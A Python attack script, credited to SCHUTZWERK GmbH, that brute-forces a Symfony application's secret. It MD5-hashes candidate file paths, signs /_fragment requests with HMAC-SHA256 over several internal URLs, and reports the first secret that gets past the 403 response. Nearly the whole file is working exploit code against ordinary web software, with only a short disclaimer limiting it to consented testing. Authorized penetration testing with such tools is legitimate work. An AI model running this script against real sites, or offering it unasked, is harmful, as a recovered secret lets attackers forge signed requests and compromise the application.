#!/usr/bin/env python3

# SCHUTZWERK GmbH
# David Brown

# Based on previous work by Ambionics Security:
# https://www.ambionics.io/blog/symfony-secret-fragment

# This tool is made for educational and ethical testing purposes only. Usage this
# script for attacking targets without prior mutual consent is illegal.
# Developers and SCHUTZWERK GmbH assume no liability and are not responsible for
# any misuse or damage caused by this script.

import hashlib
import base64
import hmac
import requests
import urllib3
import urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed
import sys
import argparse
import itertools

urllib3.disable_warnings()

COMMON_INTERNAL_URLS = [
    "http://localhost/_fragment",
    "http://localhost:80/_fragment",
    "https://localhost/_fragment",
    "https://localhost:443/_fragment",
]


def generate_mutations(url, internal_url, secrets):
    if internal_url:
        internal_urls = [internal_url]
    elif url.startswith("https://"):
        internal_urls = [url, url.replace("https://", "http://")]
    else:
        internal_urls = [url, url.replace("http://", "https://")]

    for url in COMMON_INTERNAL_URLS:
        if url not in internal_urls:
            internal_urls.append(url)

    return list(itertools.product(secrets, internal_urls))


def encode_hash(fragment_hash):
    encoded_fragment_hash = base64.b64encode(fragment_hash)
    return urllib.parse.quote_plus(encoded_fragment_hash).replace("/", "%2F")


def compute_md5(path):
    return hashlib.md5(path.encode("utf-8")).hexdigest()


def compute_hash(url, secret):
    return hmac.HMAC(
        secret.encode("utf-8"),
        url.encode("utf-8"),
        hashlib.sha256,
    ).digest()


def do_work(session, url, internal_url, secret):

    fragment_hash = compute_hash(internal_url, secret)
    encoded_fragment_hash = encode_hash(fragment_hash)
    check_url = url + f"?_hash={encoded_fragment_hash}"

    r = session.get(check_url, allow_redirects=False)

    return {
        "url": url,
        "internal_url": internal_url,
        "secret": secret,
        "fragment_hash": fragment_hash,
        "check_url": check_url,
        "response": r,
    }


def is_access_denied_response(response):
    if response.status_code == 403:
        return True
    elif "/error-page/403" in response.text:
        return True

    return False


parser = argparse.ArgumentParser()
parser.add_argument("url", help="Target URL (e.g. https://www.example.com/_fragment)")
parser.add_argument("-i", "--internal-url", help="URL used to compute the hash")
parser.add_argument("-p", "--path")
parser.add_argument("-pL", "--path-list")
args = parser.parse_args()

if args.path_list:
    with open(args.path_list, "r") as fh:
        paths = fh.readlines()
elif args.path:
    paths = [args.path]
else:
    print("Specify either --path or --path-list")
    sys.exit(-1)

secrets = {
    compute_md5(path.rstrip()): path.rstrip()
    for path in paths
    if not path.startswith("#")
}

session = requests.session()

# session.proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
# session.verify = False

r = session.get(args.url, allow_redirects=False)

if not is_access_denied_response(r):
    print("Unexpected response")
    sys.exit(1)

threads = []
with ThreadPoolExecutor(max_workers=5) as executor:
    mutations = generate_mutations(args.url, args.internal_url, secrets.keys())
    for secret, internal_url in mutations:
        threads.append(
            executor.submit(do_work, session, args.url, internal_url, secret)
        )

    for task in as_completed(threads):
        result = task.result()
        if not is_access_denied_response(result["response"]):
            print(
                f'[+] {result["url"]} {result["internal_url"]} {result["secret"]} '
                f'({secrets[result["secret"]]})'
            )
            sys.exit(0)
        else:
            print(f'[-] {result["url"]} {result["internal_url"]} {result["secret"]}')
